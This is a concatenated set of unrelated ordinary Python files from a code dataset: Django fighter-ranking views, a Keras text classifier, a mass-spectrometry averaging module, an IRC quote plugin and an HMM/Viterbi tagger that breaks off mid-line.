fin.loser.save()\r\n fin.save()\r\n bout.completed = True\r\n bout.save()\r\n return redirect('promotions:event', bout.event.pk)\r\n\r\ndef finish_event(request, pk):\r\n event = get_object_or_404(Event, pk=pk)\r\n offers = FightOffer.objects.all().filter(event=event)\r\n event.finished = True\r\n event.save()\r\n for o in offers:\r\n o.delete()\r\n\r\n return redirect('promotions:event', event.pk)\r\n\r\n\r\ndef set_fight_scores(pk):\r\n fin_bout = get_object_or_404(FinishedFight, pk=pk)\r\n r1 = 10**(fin_bout.winner.points/400)\r\n r2 = 10**(fin_bout.loser.points/400)\r\n e1 = r1/(r1 + r2)\r\n e2 = r2 / (r1 + r2)\r\n w = 75 * (1 - e1)\r\n l = 75 * (0 - e2)\r\n\r\n if fin_bout.method is not \"DEC\":\r\n w = w * (1 +((6-fin_bout.round)/20))\r\n l = l * (1 +((6-fin_bout.round)/20))\r\n\r\n fin_bout.winnerPoints = w\r\n fin_bout.loserPoints = l\r\n fin_bout.save()\r\n return 0\r\n\r\n\r\ndef score_fighters():\r\n fighters = Fighter.objects.all()\r\n for fighter in fighters:\r\n points = fighter.initialPointsBoost\r\n fights = FinishedFight.objects.all().filter(Q(winner=fighter) | Q(loser=fighter))\r\n for fight in fights:\r\n if fight.winner == fighter:\r\n points += fight.winnerPoints\r\n else:\r\n points += fight.loserPoints\r\n fighter.points = 1000 + points\r\n fighter.save()\r\n return 0\r\n\r\n\r\ndef ranking(weight):\r\n fighters = Fighter.objects.all().filter(weight=weight).order_by('-points')\r\n rank = 1\r\n\r\n for x in fighters:\r\n x.rank = rank\r\n rank += 1\r\n x.save()\r\n\r\n return 0\r\n","sub_path":"ammamanager/views/promotions.py","file_name":"promotions.py","file_ext":"py","file_size_in_byte":13170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"107989579","text":"# array of [value, probability] pairs\ndata = [[1, 0.2], [2, 0.4], [3, 0.3], [4, 0.1]]\n\ndef calc_expect(d):\n expectation = 0\n for x in d:\n expectation += x[0] * x[1]\n return expectation\n\ndef calc_disp(d):\n expectation = calc_expect(d)\n dispersion = 0\n for x in d:\n dispersion += ((x[0] - expectation) ** 2) * x[1]\n return dispersion\n\nif __name__ == '__main__':\n print(\"Data: \" + str(data))\n print(\"Expectation: \" + str(calc_expect(data)))\n print(\"Dispersion: \" + str(calc_disp(data)))\n","sub_path":"src/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"516576243","text":"\"\"\"\n\trocshelf v 0.1 ( Pre-Alpha )\n\tЗаложен фундамент принципа работы и инструменты для разработки.\n\"\"\"\n\nimport click\nfrom core import rocshelf as core\nfrom core import core_clear\n\n@click.group()\ndef cli():\n pass\n\n@click.command()\n@click.option('--action', \t'-a', default = False, help='Действие ( create / delite )')\n@click.option('--shelf', \t'-s', default = False, help='Тип ( page , tag , basic ) ')\n@click.option('--name', \t'-n', default = False, help='Название')\ndef shelf(action, shelf, name):\n\tif not action:\texit('Введите действие -a !')\n\tif not shelf:\texit('Введите тип элемента -s !')\n\tif not name:\texit('Введите имя элемента -n !')\n\tcore().shelf(shelf, name, action)\n\n@click.command()\ndef start():\n\tcore().start()\n\n@click.command()\ndef training():\n\tcore().training()\n\n@click.command()\ndef clear():\n\tcore_clear()\n\ncli.add_command(shelf)\ncli.add_command(start)\ncli.add_command(training)\ncli.add_command(clear)\n\nif __name__ == '__main__':\n cli()\t","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"448404250","text":"# -*- coding: utf-8 -*-\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimport numpy as np\n\nfrom gensim import corpora, models, similarities\nfrom collections import defaultdict\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, Conv1D, MaxPooling1D, Dropout, Input, concatenate\nfrom keras.layers.embeddings import Embedding\nfrom keras.preprocessing import sequence\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.utils.np_utils import to_categorical\nfrom keras.models import Model\n\nimport re\nimport joblib as jl\n\n# 分类数目\ngenre = 0\n# 最大长度\nmaxLen = 30\n# 训练轮数\nepochs = 500\n\n# 读取文件所在路径\nfilepath = '../data/input_total/salary_question/'\nsavepath = './models/textCNN_model_salary_gensim.h5'\n\n# 忽略的单词\n\n# 不去掉停词\nstoplist = set(''.split())\n\n# 复杂版\n# stoplist = set('please for a of the and to in are can who one i was youre should than our had an after now us we under dont two five about other do didnt so were will does I like you with your , if did at on as be from that minute whats im . ? / ( ) [ ] | this would this yourself tell why which any have it is could when or me what here how'.split())\n\n# 简易版\n# stoplist = set('please for a of is be the and to in are can about other do were I like you your ? , .'.split())\n\n# 去除换行符\ndef rm(text):\n\n\trm = re.compile(r'\\n')\n\treturn rm.sub('', text)\n\n# 读文件\ndef readFile(path=filepath):\n\n\tall_texts = []\n\tall_labels = []\n\tfile_list = []\n\n\tfor file in os.listdir(path):\n\t\tfile_list.append(path + file)\n\n\tcounter_file = 0\n\tfor file_name in file_list:\n\t\twith open(file_name, encoding='utf-8') as f:\n\t\t\twhile 1:\n\t\t\t\tline = f.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tcounter_file += 1\n\t\t\t\t\tbreak\n\t\t\t\tall_texts.append(rm(\"\".join(line)))\n\t\t\t\tall_labels.append(counter_file)\n\n\tgenre = counter_file\n\t\n\treturn all_texts, all_labels\n\n# 预处理\ndef stringProcessing(documents):\n\n\tfrequency = defaultdict(int)\n\n\t# 遍历所有的词句,把不在忽略列表中的单词加入texts\n\ttexts = [[word for word in document.lower().split() if word not in stoplist]\n\t\t\tfor document in documents]\n\n\t# 记录词出现频率\n\tfor text in texts:\n\t\tfor token in text:\n\t\t\tfrequency[token] += 1\n\n\t# 将出现次数大于一的保留\n\ttexts = [[token for token in text if frequency[token] > 1]\n\t\t\t for text in texts]\n\n\ttexts_concate = []\n\t#maxLenth = 0\n\tfor sentence in texts:\n\t\t# if(len(sentence) > maxLenth):\n\t\t# \tmaxLenth = len(sentence)\n\t\ttexts_concate.append(\" \".join(sentence))\n\n\twith open('./string/module/stoplist_salary', \"wb\") as handler:\n\t\tjl.dump(stoplist, handler)\n\n\twith open('./string/module/frequency_salary', \"wb\") as handler:\n\t\tjl.dump(frequency, handler)\n\n\treturn texts_concate\n\ndef preprocessing(train_texts, train_labels, test_texts, test_labels):\n\n\ttokenizer = Tokenizer(num_words=200)\n\ttokenizer.fit_on_texts(train_texts)\n\tx_train_seq = tokenizer.texts_to_sequences(train_texts)\n\tx_test_seq = tokenizer.texts_to_sequences(test_texts)\n\t# print(x_train_seq)\n\tx_train = sequence.pad_sequences(x_train_seq, maxlen=maxLen)\n\tx_test = sequence.pad_sequences(x_test_seq, maxlen=maxLen)\n\ty_train = np.array(train_labels)\n\ty_test = np.array(test_labels)\n\n\twith open(\"./models/tokenizer_salary\", \"wb\") as handler:\n\t\tjl.dump(tokenizer, handler)\n\n\treturn x_train, y_train, x_test, y_test\n\ndef stringProcessing_gensim(documents):\n\n\tfrequency = defaultdict(int)\n\n\t# 遍历所有的词句,把不在忽略列表中的单词加入texts\n\ttexts = [[word for word in document.lower().split() if word not in stoplist]\n\t\t for document in documents]\n\n\t# 记录词出现频率\n\tfor text in texts:\n\t\tfor token in text:\n\t\t\tfrequency[token] += 1\n\n\t# 将出现次数大于一的保留\n\ttexts = [[token for token in text if frequency[token] > 1]\n\t\t\t for text in texts]\n\n\twith open('./string/module/frequency_salary', \"wb\") as handler:\n\t\tjl.dump(frequency, handler)\n\n\treturn texts\n\n# 数组小数化\ndef gensim_corpus(dictionary, texts):\n\n\tcorpus = [dictionary.doc2bow(text) for text in texts]\n\tcorpora.MmCorpus.serialize('./string/module/dictionary_salary.mm', corpus)\n\n\ttfidf = models.TfidfModel(corpus)\n\tcorpus_tfidf = tfidf[corpus]\n\n\t# initialize an LSI transformation\n\tlsi = models.LsiModel(corpus_tfidf, id2word=dictionary, num_topics=maxLen) \n\tcorpus_lsi = lsi[corpus_tfidf]\n\n\tcorpus_vectors = [[vector[1] for vector in doc ] for doc in corpus_lsi]\n\n\treturn corpus_vectors\n\n# 获取训练数组\ndef preprocessing_gensim(train_texts, train_labels, test_texts, test_labels):\n\n\tdictionary = corpora.Dictionary(train_texts)\n\tdictionary.save('./string/module/dictionary_salary.dict')\n\n\tx_train_seq = gensim_corpus(dictionary, train_texts)\n\tx_test_seq = gensim_corpus(dictionary, test_texts)\n\n\t# 预处理小数,否则在pad过程中将会被忽略为0\n\tfor index_i in range(len(x_train_seq)):\n\t\tfor index_j in range(len(x_train_seq[index_i])):\n\t\t\tx_train_seq[index_i][index_j] *= 100\n\t\t\tx_train_seq[index_i][index_j] += 100\n\tfor index_i in range(len(x_test_seq)):\n\t\tfor index_j in range(len(x_test_seq[index_i])):\n\t\t\tx_test_seq[index_i][index_j] *= 100\n\t\t\tx_test_seq[index_i][index_j] += 100\t \n\t\n\tx_train = sequence.pad_sequences(x_train_seq, maxlen=maxLen)\n\tx_test = sequence.pad_sequences(x_test_seq, maxlen=maxLen)\n\n\ty_train = np.array(train_labels)\n\ty_test = np.array(test_labels)\n\n\treturn x_train, y_train, x_test, y_test\n\ndef text_cnn(maxlen=maxLen, max_features=200, embed_size=32):\n\n\tcomment_seq = Input(shape=[maxlen], name='x_seq')\n\temb_comment = Embedding(max_features, embed_size)(comment_seq)\n\n\tconvs = []\n\tfilter_sizes = [2, 3, 4, 5]\n\tfor fsz in filter_sizes:\n\t\tl_conv = Conv1D(filters=100, kernel_size=fsz, activation='relu')(emb_comment)\n\t\tl_pool = MaxPooling1D(maxlen - fsz + 1)(l_conv)\n\t\tl_pool = Flatten()(l_pool)\n\t\tconvs.append(l_pool)\n\tmerge = concatenate(convs, axis=1)\n\n\tout = Dropout(0.5)(merge)\n\toutput = Dense(32, activation='relu')(out)\n\toutput = Dense(units=genre, activation='softmax')(output)\n\t#output = Dense(units=3, activation='sigmoid')(output)\n\n\tmodel = Model([comment_seq], output)\n\t#model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n\tmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n\treturn model\n\ntrain_texts, train_lables = readFile()\ntest_texts, test_labels = readFile()\n\n# 经过gensim的特征向量提取处理\ntrain_texts = stringProcessing_gensim(train_texts)\ntest_texts = stringProcessing_gensim(test_texts)\n\nx_train, y_train, x_test, y_test = preprocessing_gensim(train_texts, train_lables, test_texts, test_labels)\n\n# 非gensim的特征向量提取处理\n# train_texts = stringProcessing(train_texts)\n# test_texts = stringProcessing(test_texts)\n\n# x_train, y_train, x_test, y_test = preprocessing(train_texts, train_lables, test_texts, test_labels)\n\n# print(x_train, x_test)\n\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\n\nmodel = text_cnn()\n\nmodel.fit(x_train, y_train,\n\t\t\tvalidation_split=0.1,\n\t\t\tbatch_size=128,\n\t\t\tepochs=epochs,\n\t\t\tshuffle=True)\n\nscores = model.evaluate(x_train, y_train)\nprint(scores)\n\n# 保存模型\nmodel.save(savepath)\n","sub_path":"tensorflow/scripts/demo/scripts/textCNN_gensim.py","file_name":"textCNN_gensim.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"654215636","text":"class Solution:\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n '''\n 使用贪心算法,只要能赚钱就卖出\n '''\n res = 0\n for i in range(len(prices) - 1):\n if prices[i] < prices[i + 1]:\n res += prices[i + 1] - prices[i]\n return res\n\n\nif __name__ == '__main__':\n # s = Solution()\n # prices = [1, 2, 3, 4, 5]\n # print(s.maxProfit(prices))\n print('\\n'.join([''.join([('Love'[(x - y) % len('Love')] if ((x * 0.05) ** 2 + (y * 0.1) ** 2 - 1) ** 3 - (\n x * 0.05) ** 2 * (y * 0.1) ** 3 <= 0 else ' ') for x in range(-30, 30)]) for y in range(30, -30, -1)]))\n","sub_path":"maxProfit.py","file_name":"maxProfit.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"50006220","text":"import time\nimport random\nimport sqlite3\nimport datetime\n\nfrom aqbot.lib.plugins.plugin import PluginObject\n\n__all__ = [\"QuotePlugin\"]\n\n\nclass QuotePlugin(PluginObject):\n filename = 'db/quotes.db'\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def setup(self):\n conn = sqlite3.connect(self.filename)\n c = conn.cursor()\n c.execute('''CREATE TABLE IF NOT EXISTS quotes(\n id INTEGER PRIMARY KEY,\n user TEXT,\n quote TEXT,\n date TEXT)''')\n conn.commit()\n conn.close()\n\n self.command_manager.add(self, self.quote_cmd, \"!q\", [\"!quote\"])\n\n def quote_cmd(self, listener, sender, target, args):\n arg_list = args.split()\n\n db = sqlite3.connect(self.filename)\n c = db.cursor()\n\n if len(arg_list) < 1:\n c.execute(\"SELECT user,quote,date FROM quotes\")\n rows = c.fetchall()\n\n q = random.choice(rows)\n stamp = datetime.datetime.fromtimestamp(int(q[2])).strftime('%Y-%m-%d')\n self.messenger.msg(target, \"\\\"%s\\\" -%s, %s\" % (q[1], q[0], stamp))\n return\n\n if len(arg_list) > 1 and arg_list[0].lower() == \"add\":\n user = arg_list[1]\n trimlen = len(user)+5\n c.execute('INSERT INTO quotes VALUES (NULL,?,?,?)', (user, args[trimlen:], str(time.time())))\n db.commit()\n self.messenger.msg(target, \"Added!\")\n return\n\n user = arg_list[0]\n c.execute(\"SELECT user,quote,date FROM quotes WHERE user = ?\", user)\n rows = c.fetchall()\n if not rows:\n self.messenger.msg(target, \"No quotes for %s found.\" % user)\n return\n\n q = random.choice(rows)\n stamp = datetime.datetime.fromtimestamp(int(q[2])).strftime('%Y-%m-%d')\n self.messenger.msg(target, \"\\\"%s\\\" -%s, %s\" % (q[1], user, stamp))\n","sub_path":"aqbot/plugins/quote.py","file_name":"quote.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"423327201","text":"#!/usr/bin/env python\n\n\"\"\"\nA variety of push utility functions\n\"\"\"\n\nfrom pylib.util.git_util import GitUtil\n\n__author__ = 'edelman@room77.com (Nicholas Edelman)'\n__copyright__ = 'Copyright 2013 Room77, Inc.'\n\n\nclass PushUtil(object):\n @classmethod\n def get_deployspec_name(cls, cluster_name):\n \"\"\"given a cluster returns the deployspec name\n convention of $cluster-$current_branchname.\n Args:\n cluster - the cluster name\n Returns:\n the deployspec name for the current branch and cluster\n \"\"\"\n return '%s-%s' % (cluster_name, GitUtil.get_current_branch())\n","sub_path":"pylib/mps/util/push_util.py","file_name":"push_util.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"186469678","text":"#!/usr/bin/env python3\n\nimport PWMmay as PWM\n\nchannel = \"P9_14\"\n\n# print(PWM.get_pwm_key(channel))\n\n# print(PWM.get_pwm_path(channel))\n\nerr = PWM.start(channel, 50, freq=1000)\nif err == None:\n exit()\n\nprint(PWM.set_frequency(channel, 10000))\n\nprint(PWM.set_duty_cycle(channel, 10))\n\n# print(PWM.stop(channel))","sub_path":"python/PWMtest.py","file_name":"PWMtest.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"507417162","text":"import math\nfrom collections import defaultdict\n\nimport numpy as np\n\nfrom ms_peak_picker import search\nfrom ms_peak_picker.utils import peaklist_to_profile\n\n\ndef average_profile_scans(scan_arrays, width=0.01):\n groups = [[arr.astype(float) for arr in group] for group in scan_arrays]\n\n mzs = set()\n for mz_array, intensity_array in groups:\n mzs.update(mz_array)\n\n mzs = sorted(mzs)\n mz_out = []\n intensity_out = []\n\n _abs = abs\n _len = len\n\n for mz in mzs:\n cluster_mzs = []\n cluster_intensities = []\n for group in groups:\n mz_array, intensity_array = group\n left_ix = search.get_nearest(mz_array, mz - width, 0)\n left_mz = mz_array[left_ix]\n err = (left_mz - (mz - width))\n abs_err = _abs(err)\n if abs_err > width:\n if err > 0 and left_ix != 0:\n left_ix -= 1\n elif left_ix != _len(mz_array) - 1:\n left_ix += 1\n\n left_mz = mz_array[left_ix]\n err = (left_mz - (mz - width))\n if _abs(err) > (2 * width):\n continue\n\n right_ix = search.get_nearest(mz_array, mz + width, 0)\n right_mz = mz_array[right_ix]\n err = (right_mz - (mz + width))\n abs_err = _abs(err)\n if abs_err > width:\n if err > 0:\n right_ix -= 1\n elif right_ix != _len(mz_array) - 1:\n right_ix += 1\n\n right_mz = mz_array[right_ix]\n err = (right_mz - (mz + width))\n abs_err = _abs(err)\n if abs_err > (2 * width):\n continue\n\n mz_values = mz_array[left_ix:(right_ix + 1)]\n intensity_values = intensity_array[left_ix:(right_ix + 1)]\n\n cluster_mzs.extend(mz_values)\n cluster_intensities.extend(intensity_values)\n\n cluster_mzs = np.array(cluster_mzs)\n cluster_intensities = np.array(cluster_intensities)\n ix = np.argsort(cluster_mzs)\n cluster_mzs = cluster_mzs[ix]\n cluster_intensities = cluster_intensities[ix]\n\n u = np.mean(cluster_mzs)\n sd = np.std(cluster_mzs)\n gauss_weights = np.exp(-((cluster_mzs - u) ** 2) / (2 * (sd ** 2)))\n intensity = (gauss_weights * cluster_intensities).sum() / \\\n gauss_weights.sum()\n mz_out.append(mz)\n intensity_out.append(intensity)\n return np.array(mz_out, dtype=np.float64), np.array(intensity_out, dtype=np.float64)\n\n\ndef peak_set_similarity(peak_set_a, peak_set_b, precision=0):\n \"\"\"Computes the cosine distance between two peak sets, a similarity metric\n ranging between 0 (dissimilar) to 1.0 (similar).\n\n Parameters\n ----------\n peak_set_a : Iterable of Peak-like\n peak_set_b : Iterable of Peak-like\n The two peak collections to compare. It is usually only useful to\n compare the similarity of peaks of the same class, so the types\n of the elements of `peak_set_a` and `peak_set_b` should match.\n precision : int, optional\n The precision of rounding to use when binning spectra. Defaults to 0\n\n Returns\n -------\n float\n The similarity between peak_set_a and peak_set_b. Between 0.0 and 1.0\n \"\"\"\n bin_a = defaultdict(float)\n bin_b = defaultdict(float)\n\n positions = set()\n\n for peak in peak_set_a:\n mz = round(peak.mz, precision)\n bin_a[mz] += peak.intensity\n positions.add(mz)\n\n for peak in peak_set_b:\n mz = round(peak.mz, precision)\n bin_b[mz] += peak.intensity\n positions.add(mz)\n\n z = 0\n n_a = 0\n n_b = 0\n\n for mz in positions:\n a = bin_a[mz]\n b = bin_b[mz]\n z += a * b\n n_a += a ** 2\n n_b += b ** 2\n\n n_ab = math.sqrt(n_a) * math.sqrt(n_b)\n if n_ab == 0.0:\n return 0.0\n else:\n return z / n_ab\n\n\ndef average_peak_lists(peak_lists, width=0.01):\n scan_arrays = map(peaklist_to_profile, peak_lists)\n return average_profile_scans(scan_arrays, width=width)\n","sub_path":"ms_peak_picker/scan_averaging.py","file_name":"scan_averaging.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"528991431","text":"\nimport pprint \nimport itertools\n\nclass Word:\n\n\tdef __init__(self,syntax,tag):\n\t\tself.syntax = syntax\n\t\tself.tag = tag\n\nclass Sentence:\n\t\n\tdef __init__(self,*words):\n\t\tself.words = list(words)\n\t\tpass\n\t\n\tdef getTagSequenceNPrev(self,*words):\n\t\tself.tambah(words)\n\t\tpass\n\t\n\tdef getFirstWord(self,):\n\t\treturn words[0]\n\t\n\tdef tambah(self,*words):\n\t\tfor word in words:\n\t\t\tself.words.append(word)\n\t\n\tdef getSentence(self):\n\t\tresult =\"\"\n\t\tfor word in self.words:\n\t\t\tresult += word.syntax+\"/\"+word.tag+\" \"\n\t\t\t# result += word.tag+\" \"\n\t\treturn result\n\n\tdef countStartingTransitionInSentence(self,condition_tags,next_tag):\n\t\tsequence = [ x for x in condition_tags if x != 's']\n\t\tif next_tag != \"*\":\n\t\t\tsequence.append(next_tag)\n\t\tfor ii in list(range(0,len(sequence))):\n\t\t\tif self.words[ii].tag != sequence[ii]:\n\t\t\t\treturn 0\n\t\treturn 1\n\n\t\"\"\" menghitung P(next_tag | condition_tags) berupa array (ngram)\"\"\"\n\tdef countTransitionInSentence(self,condition_tags,next_tag):\n\t\tresult = 0\n\t\tsequence = condition_tags[:]\n\t\tsequence.append(next_tag)\n\t\tfor idx,word in enumerate(self.words):\n\t\t\tmatching=True;\n\t\t\tif idx+len(sequence) > len(self.words):\n\t\t\t\tbreak;\n\t\t\tfor seq_idx,seqItem in enumerate(sequence):\n\t\t\t\tmatching = matching and ((self.words[idx+seq_idx].tag==sequence[seq_idx]) or sequence[seq_idx]=='*') #kalo bintang match semua tag\n\t\t\tif matching:\n\t\t\t\tresult += 1\n\t\treturn result\n\n\tdef countTagInSentence(self,target_tag,word_filter=None):\n\t\tresult = 0\n\t\tfor word in self.words:\n\t\t\tif word_filter == None:\n\t\t\t\tcountCondition = word.tag == target_tag\n\t\t\telse:\n\t\t\t\tcountCondition = word.tag == target_tag and word.syntax == word_filter\n\t\t\tif countCondition :\n\t\t\t\tresult+=1\n\t\treturn result\n\nclass HMM_Model:\n\n\tdef __init__(self, *sentences):\n\t\tself.sentences = list(sentences)\n\t\tself.uniqueTags = set([])\n\t\tself.uniqueWords = set([])\n\t\tself.reloadUniqueTagsNWords() # mengisi uniqueTag\n\t\tpass\n\n\tdef smoothing(self,emissionTable):\n\t\tNOMINATOR = 0\n\t\tDENOMINATOR = 1\n\t\tnew_denom = 0.0;\n\t\tfor tag in emissionTable:\n\t\t\tnew_denom = 0.0\n\t\t\tfor word in emissionTable[tag]:\n\t\t\t\tnew_denom += emissionTable[tag][word][NOMINATOR]+1\n\t\t\tfor word in emissionTable[tag]:\n\t\t\t\temissionTable[tag][word] = (emissionTable[tag][word][NOMINATOR]+1,new_denom)\n\t\t\t\t# emissionTable[tag][word][DENOMINATOR] = new_denom \n\t\treturn emissionTable\n\n\tdef generateStartingTransitionTable(self,ngram):\n\t\tngram = ngram-1\n\t\ttransitionTable = {}\n\t\tstartingUniqueTags = ['s'] + list(self.uniqueTags)\n\t\tall_current_tag = self.getPermute(startingUniqueTags,ngram)\n\t\tall_current_tag = [x for x in all_current_tag if x[0]=='s'] # ambil hanya permutasi yang depannya \n\t\tfor current_tag in all_current_tag:\n\t\t\tstartingTransitionRow = {}\n\t\t\tfor next_tag in self.uniqueTags:\n\t\t\t\tstartingTransitionRow[next_tag] = self.calculateStartingTransitionProb(list(current_tag),next_tag)\n\t\t\ttransitionTable[current_tag]=startingTransitionRow\n\t\treturn transitionTable\n\n\tdef generateTransitionTable(self,ngram):\n\t\tngram = ngram-1\n\t\ttransitionTable = {}\n\t\tall_current_tag = self.getPermute(self.uniqueTags,ngram)\n\t\tfor current_tag in all_current_tag:\n\t\t\ttransitionRow = {}\n\t\t\tfor next_tag in self.uniqueTags:\n\t\t\t\ttransitionRow[next_tag] = self.calculateTransitionProb(list(current_tag),next_tag)\n\t\t\ttransitionTable[current_tag]=transitionRow\n\t\treturn transitionTable\n\n\tdef generateEmissionTable(self):\n\t\temissionTable = {}\n\t\tfor tag in self.uniqueTags:\n\t\t\temissionRow = {}\n\t\t\tfor word in self.uniqueWords:\n\t\t\t\temissionRow[word]=self.calculateEmissionProb(word,tag)\n\t\t\temissionTable[tag]=emissionRow\n\t\treturn emissionTable\n\n\t\"\"\" menghitung P(next_tag|current_tag) \"\"\"\n\tdef calculateStartingTransitionProb(self,condition_tags,next_tag):\n\t\tdenominator = self.countStartingTransitionFromAll(condition_tags,\"*\")\n\t\tif denominator == 0 :\n\t\t\t# print \"error devided by zero\"\n\t\t\treturn (0,0)\n\n\t\treturn (float(self.countStartingTransitionFromAll(condition_tags,next_tag)) , denominator)\n\n\t\"\"\" menghitung P(next_tag|current_tag) \"\"\"\n\tdef calculateTransitionProb(self,condition_tags,next_tag):\n\t\tdenominator = self.countTransitionFromAll(condition_tags,\"*\")\n\t\tif denominator == 0 :\n\t\t\t# print \"error devided by zero\"\n\t\t\treturn (0,0)\n\n\t\treturn (float(self.countTransitionFromAll(condition_tags,next_tag)) , denominator)\n\n\t\"\"\" menghitung P(word_syntax|tag) \"\"\"\n\tdef calculateEmissionProb(self,word_syntax,tag):\n\t\tdenominator = self.countTagFromAll(tag)\n\t\tif denominator == 0 :\n\t\t\tprint(\"error devided by zero\")\n\t\t\treturn 0;\n\t\treturn (float(self.countTagFromAll(tag,word_syntax)),denominator)\n\n\tdef countStartingTransitionFromAll(self,condition_tags,next_tag):\n\t\tresult = 0 \n\t\tfor sentence in self.sentences:\n\t\t\tresult += sentence.countStartingTransitionInSentence(condition_tags,next_tag)\n\t\treturn result\n\n\tdef countTransitionFromAll(self,condition_tags,next_tag):\n\t\tresult = 0 \n\t\tfor sentence in self.sentences:\n\t\t\tresult += sentence.countTransitionInSentence(condition_tags,next_tag)\n\t\treturn result\n\n\t\"\"\" menghitung jumlah tag target_tag di semua sentence \"\"\"\n\tdef countTagFromAll(self,target_tag,word_filter=None):\n\t\tresult = 0\n\t\tfor sentence in self.sentences:\n\t\t\tif word_filter == None:\n\t\t\t\tresult += sentence.countTagInSentence(target_tag)\n\t\t\telse:\n\t\t\t\tresult += sentence.countTagInSentence(target_tag,word_filter)\t\t\t\t\n\t\treturn result\n\n\tdef tambah(self,*sentence):\n\t\tself.sentences.append(sentence)\n\t\tpass\n\n\tdef reloadUniqueTagsNWords(self):\n\t\tfor sentence in self.sentences:\n\t\t\tfor word in sentence.words:\n\t\t\t\tself.uniqueTags.add(word.tag)\n\t\t\t\tself.uniqueWords.add(word.syntax)\n\t\tpass\n\n\tdef addUnknownWord(self,sentences):\n\t\tfor sentence in sentences:\n\t\t\tfor word in sentence.words:\n\t\t\t\tself.uniqueWords.add(word.syntax)\n\t\tpass\n\n\tdef getPermute(self, set_of_item, length):\n\t\treturn itertools.product(set_of_item, repeat=length)\n\n\tdef printSentences(self):\n\t\tfor sentence in self.sentences:\n\t\t\tprint(sentence.getSentence())\n\nclass Viterbi:\n\tTAG_SEQUENCE = 0\n\tPROBABILITY = 1\n\n\tdef __init__(self,startingTransitionTable,transitionTable,emissionTable,ngram):\n\t\tself.startingTransitionTable = startingTransitionTable\n\t\tself.transitionTable = transitionTable\n\t\tself.emissionTable = emissionTable\n\t\tself.viterbiTable = {}\n\t\tself.ngram = ngram\n\n\tdef generateViterbiSequence(self, testing_sentence):\n\t\tcummulative_word=[]\n\t\taltered_testing_words = self.alterIdenticWordNSplit(testing_sentence)\n\t\tngram_addition = self.ngram-1\n\t\tuniqueTags = self.emissionTable.keys()\n\t\tfor word in altered_testing_words:\n\t\t\tcummulative_word.append(word)\n\t\t\tfor tag in self.getViterbiPermute(uniqueTags,altered_testing_words,len(cummulative_word)):\n\t\t\t\tprint(\"P(\"+\",\".join(tag)+\"|\"+\" \".join(cummulative_word)+\") = \"),\n\t\t\t\tprobResult = self.calculateViterbiConditional(tag,cummulative_word)\n\t\t\t\tself.insertToTable(tag[-ngram_addition:],word,tag,probResult)\n\t\tprint(\"final table==============\")\n\t\tprint(\"input : \"+\" \".join(altered_testing_words))\n\t\tpprint.pprint(self.viterbiTable)\n\n\tdef calculateViterbiConditional(self,tag_sequence,word_sequence):\n\t\t# tambah start state sesuai jumlah ngram\n\t\tstarting_state = []\n\t\tresult = None;\n\t\tngram_addition = self.ngram-1;\n\t\tfor ii in list(range(0,ngram_addition)):\n\t\t\tstarting_state.append(\"s\")\n\t\ttag_sequence = starting_state+list(tag_sequence)\n\t\tfor idx,tag in enumerate(word_sequence):\n\t\t\tprint(\"P(\"+tag_sequence[idx+ngram_addition]+\"|\"+\"\".join(tag_sequence[idx:idx+ngram_addition])+\")\"),\n\t\t\tprint(\"P(\"+word_sequence[idx]+\"|\"+tag_sequence[idx+ngram_addition]+\") = \"),\n\t\t\ta = self.lookUpTransitionTable(tag_sequence[idx+ngram_addition],tag_sequence[idx:idx+ngram_addition])\n\t\t\t# print(a),\n\t\t\tprint(\" * \"),\n\t\t\tb = self.lookUpEmissionTable(word_sequence[idx],tag_sequence[idx+ngram_addition])\n\t\t\t# print(b),\n\t\t\t# print(\" = \"+str(a*b)),\n\t\t\tif result == None :\n\t\t\t\tresult = a*b \n\t\t\telse:\n\t\t\t\tresult *= (a*b)\n\t\tprint(\"|||| \"+str(result))\n\t\t# print \n\t\treturn result\n\n\tdef lookUpTransitionTable(self,next_tag,current_tag):\n\t\tNOMINATOR = 0\n\t\tDENOMINATOR = 0\n\t\tcurrent_tag = tuple(current_tag)\n\t\tif 's' in current_tag:\n\t\t\ttableEntry = self.startingTransitionTable[current_tag][next_tag]\n\t\telse:\n\t\t\ttableEntry = self.transitionTable[current_tag][next_tag]\n\t\tif tableEntry[DENOMINATOR] == 0:\n\t\t\treturn 0\n\t\treturn tableEntry[NOMINATOR]/tableEntry[DENOMINATOR]\n\t\n\tdef lookUpEmissionTable(self,word,tag):\n\t\tword = [char for char in word if char != \"#\"]\n\t\tword= \"\".join(word)\n\t\tif tag in self.emissionTable and word in self.emissionTable[tag]:\n\t\t\treturn self.emissionTable[tag][word][0]/self.emissionTable[tag][word][1]\n\t\treturn 0\n\t\n\tdef insertToTable(self,last_tag,word,tag,probResult):\n\t\tif word not in 